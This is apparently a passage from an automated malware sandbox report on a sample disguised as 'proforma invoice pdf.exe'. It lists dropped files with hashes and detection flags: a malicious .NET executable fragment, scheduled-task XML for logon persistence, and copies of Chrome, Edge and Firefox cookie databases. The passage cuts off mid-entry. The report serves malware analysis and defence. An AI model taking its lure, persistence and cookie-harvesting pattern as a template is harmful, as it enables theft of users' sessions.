SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fe4i1rgf.n5a.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksbo1h4r.byt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdzicpsg.5gg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvsc3g00.nrh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yt4pmxqx.xdb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlyiwhas.u0x.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Download File

Process:	C:\Users\user\Desktop\proforma invoice pdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	879112
Entropy (8bit):	7.128427608315233
Encrypted:	false
SSDEEP:	12288:vTEAWYMV+I4MVKWLFRLvHG0YV0k6LbRbMhG8FjrPqre71+8cYLsm2F9QykR:LhGRgYXYak6LbRR8F3inBYsm2LQB
MD5:	B67477603738159B912B0AA9C197897F
SHA1:	51A14B917E8393A3C1DED172BB04C494FDD727E3
SHA-256:	67CC97B2F5E9D35039589C92C7F6FDA7831AF0F259DDF248FB166664E4027B91
SHA-512:	685FE67B8A5D565CCDAF793A7A25DCD84789AC62E8F747800268A547AF2771CFA7B11E758A7255E5D57117FD8151364D296B52AED4AD4D96C5752CD6B0164CC4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 33%, Browse Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w.\|g..............0..".........."@... ...`....@.. ....................................`..................................?..O....`...............4...6........................................................... ............... ..H............text...( ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............2..............@..B.................@......H.......PB...7......4....y...............................................0............}.....r...p(....}.....r...p(....}.....s....}......}......}.....(.......( .....{.....r7..pr9..p~5...%-.&~4.....R...s....%.5...(...+(...+~6...%-.&~4.....S...s....%.6...(...+...G...%..(...+s.....%.rK..p.%.rY..p...H...(....rs..p ............%...%...(........0..(..........}.....{....o.....s ...... ....(!...&F...}......(........0..............{.....X..}.....s...}......{....o"....o#...t.......(

C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\proforma invoice pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\tmp351C.tmp

Download File

Process:	C:\Users\user\Desktop\proforma invoice pdf.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1600
Entropy (8bit):	5.1219978974631655
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtRxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTXv
MD5:	4E5821B4059938D1BAB9CEC870389651
SHA1:	6F28D20C8DE02F02EE064024B6CCB663E34E2659
SHA-256:	5D0F5577CF7F1A2313D8517AAF71ED46D62A24ACCEFDBD1763D5112F2839C144
SHA-512:	0982C98894E9F36BAE8089C9BD27B66406A4A75FAF1B48BCDC78E5FF800F7F175644C2923AAB44BC4A83B1B1B6CE7A19EED1C03B76E6C4369EC5981E88C390FF
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmp471D.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wTyVrj.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1600
Entropy (8bit):	5.1219978974631655
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtRxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTXv
MD5:	4E5821B4059938D1BAB9CEC870389651
SHA1:	6F28D20C8DE02F02EE064024B6CCB663E34E2659
SHA-256:	5D0F5577CF7F1A2313D8517AAF71ED46D62A24ACCEFDBD1763D5112F2839C144
SHA-512:	0982C98894E9F36BAE8089C9BD27B66406A4A75FAF1B48BCDC78E5FF800F7F175644C2923AAB44BC4A83B1B1B6CE7A19EED1C03B76E6C4369EC5981E88C390FF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmp6D52.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1600
Entropy (8bit):	5.1219978974631655
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtRxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTXv
MD5:	4E5821B4059938D1BAB9CEC870389651
SHA1:	6F28D20C8DE02F02EE064024B6CCB663E34E2659
SHA-256:	5D0F5577CF7F1A2313D8517AAF71ED46D62A24ACCEFDBD1763D5112F2839C144
SHA-512:	0982C98894E9F36BAE8089C9BD27B66406A4A75FAF1B48BCDC78E5FF800F7F175644C2923AAB44BC4A83B1B1B6CE7A19EED1C03B76E6C4369EC5981E88C390FF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmp889B.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1600
Entropy (8bit):	5.1219978974631655
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtRxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTXv
MD5:	4E5821B4059938D1BAB9CEC870389651
SHA1:	6F28D20C8DE02F02EE064024B6CCB663E34E2659
SHA-256:	5D0F5577CF7F1A2313D8517AAF71ED46D62A24ACCEFDBD1763D5112F2839C144
SHA-512:	0982C98894E9F36BAE8089C9BD27B66406A4A75FAF1B48BCDC78E5FF800F7F175644C2923AAB44BC4A83B1B1B6CE7A19EED1C03B76E6C4369EC5981E88C390FF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Roaming\1kfanbrs.2zw\Chrome\Default\Network\Cookies

Download File

Process:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1kfanbrs.2zw\Edge Chromium\Default\Network\Cookies

Download File

Process:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1kfanbrs.2zw\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite

Download File

Process:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\kbpefntq.jcw\Chrome\Default\Network\Cookies

Download File

Process:	C:\Users\user\AppData\Roaming\wTyVrj.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\kbpefntq.jcw\Edge Chromium\Default\Network\Cookies

Download File

Process:	C:\Users\user\AppData\Roaming\wTyVrj.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\kbpefntq.jcw\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite

Download File

Process:	C:\Users\user\AppData\Roaming\wTyVrj.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\pkexiv4l.s5j\Chrome\Default\Network\Cookies

Download File

Process:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\pkexiv4l.s5j\Edge Chromium\Default\Network\Cookies

Download File

Process:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\pkexiv4l.s5j\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite

Download File

Process:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rypyifrr.rj5\Chrome\Default\Network\Cookies

Download File

Process:	C:\Users\user\Desktop\proforma invoice pdf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rypyifrr.rj5\Edge Chromium\Default\Network\Cookies

Download File

Process:	C:\Users\user\Desktop\proforma invoice pdf.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rypyifrr.rj5\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite

Download File

Process:	C:\Users\user\Desktop\proforma invoice pdf.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wTyVrj.exe

Download File

Process:	C:\Users\user\Desktop\proforma invoice pdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	879112
